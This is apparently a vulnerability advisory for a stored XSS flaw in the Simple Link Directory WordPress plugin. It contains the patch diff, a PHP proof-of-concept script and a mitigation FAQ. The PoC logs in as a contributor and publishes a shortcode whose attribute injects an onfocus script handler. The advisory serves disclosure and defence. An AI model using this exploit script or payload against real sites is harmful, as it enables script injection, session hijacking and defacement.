+                        '<a href="' . esc_url(home_url('sld-demo-data')) . '" target="_blank">',
+                        '</a>',
+
+                    );
+                    ?>
+                </p>
+            </div>
+        <?php } ?>

-        <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
-            <p>
-                <?php
-                printf(
-                    __('%s SLD Demo Data Imported:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to View Demo Page %s ', 'qc-opd'),
-                    '<strong>',
-                    '</strong>',
-                    '<a href="'.esc_url(home_url('sld-demo-data')).'" target="_blank">',
-                    '</a>',
-
-                );
-                ?>
-            </p>
-        </div>
-    <?php } ?>

-
-        <div class="qcld-sldquick-flyout" >
+        <div class="qcld-sldquick-flyout">
             <div class="qcld-sldquick-flyout-items">
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium" rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium"
+                    rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Getting Started', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-admin-home"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/frequently-asked-questions/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank" style="transition-delay: 60ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/frequently-asked-questions/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer"
+                    target="_blank" style="transition-delay: 60ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('FAQ', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-flag"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 90ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item"
+                    style="transition-delay: 90ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Read the Documentation', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-sos"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/free-support/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank" style="transition-delay: 120ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/free-support/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank"
+                    style="transition-delay: 120ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Ask for Help', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-email"></i>
-                </a>
-                <a href="<?php echo esc_url('https://dev.quantumcloud.com/sld/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 30ms;">
+                </a>
+                <a href="<?php echo esc_url('https://dev.quantumcloud.com/sld/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 30ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Check out the SLD Demo', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-welcome-view-site"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/products/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium" rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/products/simple-link-directory/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium"
+                    rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Upgrade to Premium', 'qc-opd'); ?></div>
                     </div>
@@ -512,11 +556,11 @@
                 <div class="qcld-sldquick-flyout-label">
                     <div><?php echo esc_html('Start Here', 'qc-opd'); ?></div>
                 </div>
-                <img style="width:100%" src="<?php echo esc_url( QCOPD_IMG_URL . '/logo.png' ); ?>" alt="Dialogflow CX">
+                <img style="width:100%" src="<?php echo esc_url(QCOPD_IMG_URL . '/logo.png'); ?>" alt="Dialogflow CX">
             </a>
         </div>
-    <?php
-
+    <?php
+
     }

 }
 No newline at end of file
--- a/simple-link-directory/qc-op-directory-shortcodes.php
+++ b/simple-link-directory/qc-op-directory-shortcodes.php
@@ -113,35 +113,43 @@
 		), $atts
 	));

+	$title_font_size = preg_replace('/[^a-zA-Z0-9._%-]/', '', $title_font_size);
+	$subtitle_font_size = preg_replace('/[^a-zA-Z0-9._%-]/', '', $subtitle_font_size);
+	$title_line_height = preg_replace('/[^a-zA-Z0-9._%-]/', '', $title_line_height);
+	$subtitle_line_height = preg_replace('/[^a-zA-Z0-9._%-]/', '', $subtitle_line_height);
+	$min_width = preg_replace('/[^a-zA-Z0-9._%-]/', '', $min_width);
+
+
 	// check style if empty. default simple.
 	$style = ( isset( $atts["style"] ) && get_style_for_template( $atts["style"] ) ) ? get_style_for_template( $atts["style"] ) : $style;

 	//ShortCode Atts
 	$shortcodeAtts = array(
-		'orderby' 				=> $orderby,
-		'order' 				=> $order,
-		'mode' 					=> $mode,
-		'list_id' 				=> $list_id,
-		'column' 				=> $column,
-		'style' 				=> $style,
-		'min_width' 			=> $min_width,
-		'list_img' 				=> $list_img,
-		'search' 				=> $search,
-		'category' 				=> $category,
-		'upvote' 				=> $upvote,
-		'item_count' 			=> $item_count,
-		'top_area' 				=> $top_area,
-		'item_orderby' 			=> $item_orderby,
-		'item_order' 			=> $item_order,
-		'mask_url' 				=> $mask_url,
-		'enable_embedding' 		=> $enable_embedding,
-		'title_font_size' 		=> $title_font_size,
-		'subtitle_font_size' 	=> $subtitle_font_size,
-		'title_line_height' 	=> $title_line_height,
-		'subtitle_line_height' 	=> $subtitle_line_height,
-		'enable_image' 			=> $enable_image,
-		'dark_mode' 			=> $dark_mode,
+		'orderby' 				=> esc_attr($orderby),
+		'order' 				=> esc_attr($order),
+		'mode' 					=> esc_attr($mode),
+		'list_id' 				=> esc_attr($list_id),
+		'column' 				=> esc_attr($column),
+		'style' 				=> esc_attr($style),
+		'min_width' 			=> esc_attr($min_width),
+		'list_img' 				=> esc_attr($list_img),
+		'search' 				=> esc_attr($search),
+		'category' 				=> esc_attr($category),
+		'upvote' 				=> esc_attr($upvote),
+		'item_count' 			=> esc_attr($item_count),
+		'top_area' 				=> esc_attr($top_area),
+		'item_orderby' 			=> esc_attr($item_orderby),
+		'item_order' 			=> esc_attr($item_order),
+		'mask_url' 				=> esc_attr($mask_url),
+		'enable_embedding' 		=> esc_attr($enable_embedding),
+		'title_font_size' 		=> esc_attr($title_font_size),
+		'subtitle_font_size' 	=> esc_attr($subtitle_font_size),
+		'title_line_height' 	=> esc_attr($title_line_height),
+		'subtitle_line_height' 	=> esc_attr($subtitle_line_height),
+		'enable_image' 			=> esc_attr($enable_image),
+		'dark_mode' 			=> esc_attr($dark_mode),
 	);
+

 	$limit = -1;

@@ -221,7 +229,7 @@
 			                        <span class="sld-theme-icon moon">🌙</span>
 			                    </div>
 			                </label>
-			                <em id="sld-theme-status-${index}">'.$lan_enable_dark_mode.'</em>
+			                <em id="sld-theme-status-${index}">'.esc_html($lan_enable_dark_mode).'</em>
 			            </div>
 			        `);
 			    }
@@ -242,14 +250,14 @@
 	                if (currentTheme === "dark-mode") {
 	                    $toggle.prop("checked", true);
 	                    sld_dark_light_mode($toggle);
-	                    $statusText.text("'.$lan_dark_mode_on.'");
+	                    $statusText.text("'.esc_js($lan_dark_mode_on).'");
 	                }
 	            } else {
 	                if (window.matchMedia("(prefers-color-scheme: dark)").matches) {
 	                    $body.addClass("dark-mode");
 	                    $toggle.prop("checked", true);
 	                    sld_remove_dark_mode($toggle);
-	                    $statusText.text("'.$lan_light_mode_on.'");
+	                    $statusText.text("'.esc_js($lan_light_mode_on).'");
 	                }
 	            }
             }
@@ -266,13 +274,13 @@
                     $body.addClass("dark-mode");
                     localStorage.setItem(storageKey, "dark-mode");
 			        sld_dark_light_mode($thisToggle);
-                    $targetWraps.find("em").text("'.$lan_dark_mode_on.'");
+                    $targetWraps.find("em").text("'.esc_js($lan_dark_mode_on).'");
 			    } else {
 			        // RESTORE ORIGINAL STYLE
                     $body.removeClass("dark-mode");
                     localStorage.setItem(storageKey, "light-mode");
 			        sld_remove_dark_mode($thisToggle);
-                    $targetWraps.find("em").text("'.$lan_light_mode_on.'");
+                    $targetWraps.find("em").text("'.esc_js($lan_light_mode_on).'");
 			    }
 			});

--- a/simple-link-directory/templates/simple/template.php
+++ b/simple-link-directory/templates/simple/template.php
@@ -90,13 +90,13 @@
 						foreach( $lists as $list ) :
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 						?>
 						<!-- List Anchor -->
-						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = ''.$item_url.''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
+						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = '' . esc_js($item_url) . ''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
 							<?php echo (isset($list['qcopd_item_newtab']) && $list['qcopd_item_newtab'] == 1) ? 'target="_blank"' : ''; ?>>

 							<!-- Image, If Present -->
--- a/simple-link-directory/templates/style-1/template.php
+++ b/simple-link-directory/templates/style-1/template.php
@@ -155,7 +155,7 @@
 						}
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
--- a/simple-link-directory/templates/style-16/template.php
+++ b/simple-link-directory/templates/style-16/template.php
@@ -110,13 +110,13 @@
 						foreach( $lists as $list ) :
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 						?>
 						<!-- List Anchor -->
-						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = ''.$item_url.''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
+						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = '' . esc_js($item_url) . ''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
 							<?php echo (isset($list['qcopd_item_newtab']) && $list['qcopd_item_newtab'] == 1) ? 'target="_blank"' : ''; ?>>

 							<?php if( isset($enable_image)  && $enable_image == "true" ) : ?>
@@ -145,7 +145,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-2/template.php
+++ b/simple-link-directory/templates/style-2/template.php
@@ -137,7 +137,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
@@ -157,7 +157,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-3/template.php
+++ b/simple-link-directory/templates/style-3/template.php
@@ -129,7 +129,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-4/template.php
+++ b/simple-link-directory/templates/style-4/template.php
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section style-4-upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-5/template.php
+++ b/simple-link-directory/templates/style-5/template.php
@@ -129,7 +129,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section style-5-upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-7209 - Simple Link Directory <= 8.9.2 - Stored XSS via Shortcode Attributes

$target_url = 'http://example.com'; // Change to target WordPress site
$username = 'contributor'; // Must have contributor+ role
$password = 'password'; // Contributor password

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);

// Step 2: Create a new post with malicious shortcode
$rest_url = $target_url . '/wp-json/wp/v2/posts';
$payload = '45px;" onfocus="alert(1)" autofocus="';

$post_data = [
    'title' => 'CVE-2026-7209 Test',
    'content' => '[qcopd-directory title_font_size="' . $payload . '"]',
    'status' => 'publish'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . get_nonce($target_url, '/tmp/cookies.txt')
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);

echo "Post created. Visit: " . $target_url . "/?p=" . json_decode($response)->id;

function get_nonce($url, $cookie_file) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/admin-ajax.php?action=rest-nonce');
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $nonce = curl_exec($ch);
    curl_close($ch);
    return $nonce;
}

Frequently Asked Questions

What is CVE-2026-7209?
Overview of the vulnerability
CVE-2026-7209 is a Stored Cross-Site Scripting (XSS) vulnerability in the Simple Link Directory plugin for WordPress, affecting versions up to and including 8.9.2. It allows authenticated users with contributor-level access or higher to inject malicious scripts into pages via shortcode attributes.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the `qcopd-directory` shortcode. Attackers can insert scripts into attributes like `title_font_size`, which are then executed in the browsers of users accessing the affected pages.
Who is affected by this vulnerability?
Identifying affected users and systems
Any WordPress site using the Simple Link Directory plugin version 8.9.2 or earlier is affected. Additionally, only authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Simple Link Directory plugin installed. If it is version 8.9.2 or earlier, your site is at risk. Additionally, review any existing shortcodes on your posts or pages for potential malicious attributes.
How can I fix this vulnerability?
Mitigation steps
The recommended fix is to update the Simple Link Directory plugin to version 8.9.4 or later, where the vulnerability has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk to the confidentiality and integrity of the affected systems if exploited.
What are the practical risks of this vulnerability?
Potential impacts on affected sites
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browsers of users visiting the compromised page. This could lead to session hijacking, unauthorized actions on behalf of users, or defacement of the site.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept for CVE-2026-7209 illustrates how an authenticated attacker can exploit the vulnerability by logging into a WordPress site and inserting a malicious shortcode. It demonstrates the steps to authenticate and create a post that triggers the XSS attack.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider disabling the Simple Link Directory plugin until a patch can be applied. Additionally, review user roles and restrict contributor access to minimize the risk of exploitation.
Are there any other security practices I should follow?
Enhancing overall site security
In addition to updating plugins, regularly audit user roles and permissions, implement a web application firewall, and conduct security scans to identify potential vulnerabilities. Keeping backups and monitoring for suspicious activity are also recommended.
How can I report an incident if I am compromised?
Steps to take after a security breach
If you suspect that your site has been compromised, immediately change passwords for all users, especially those with administrative access. Report the incident to your hosting provider and consider restoring from a backup prior to the compromise.
What resources are available for further information?
Learning more about WordPress security
For more information on WordPress security, refer to the official WordPress security documentation, security blogs, and forums. Additionally, consider following security researchers and organizations that specialize in WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations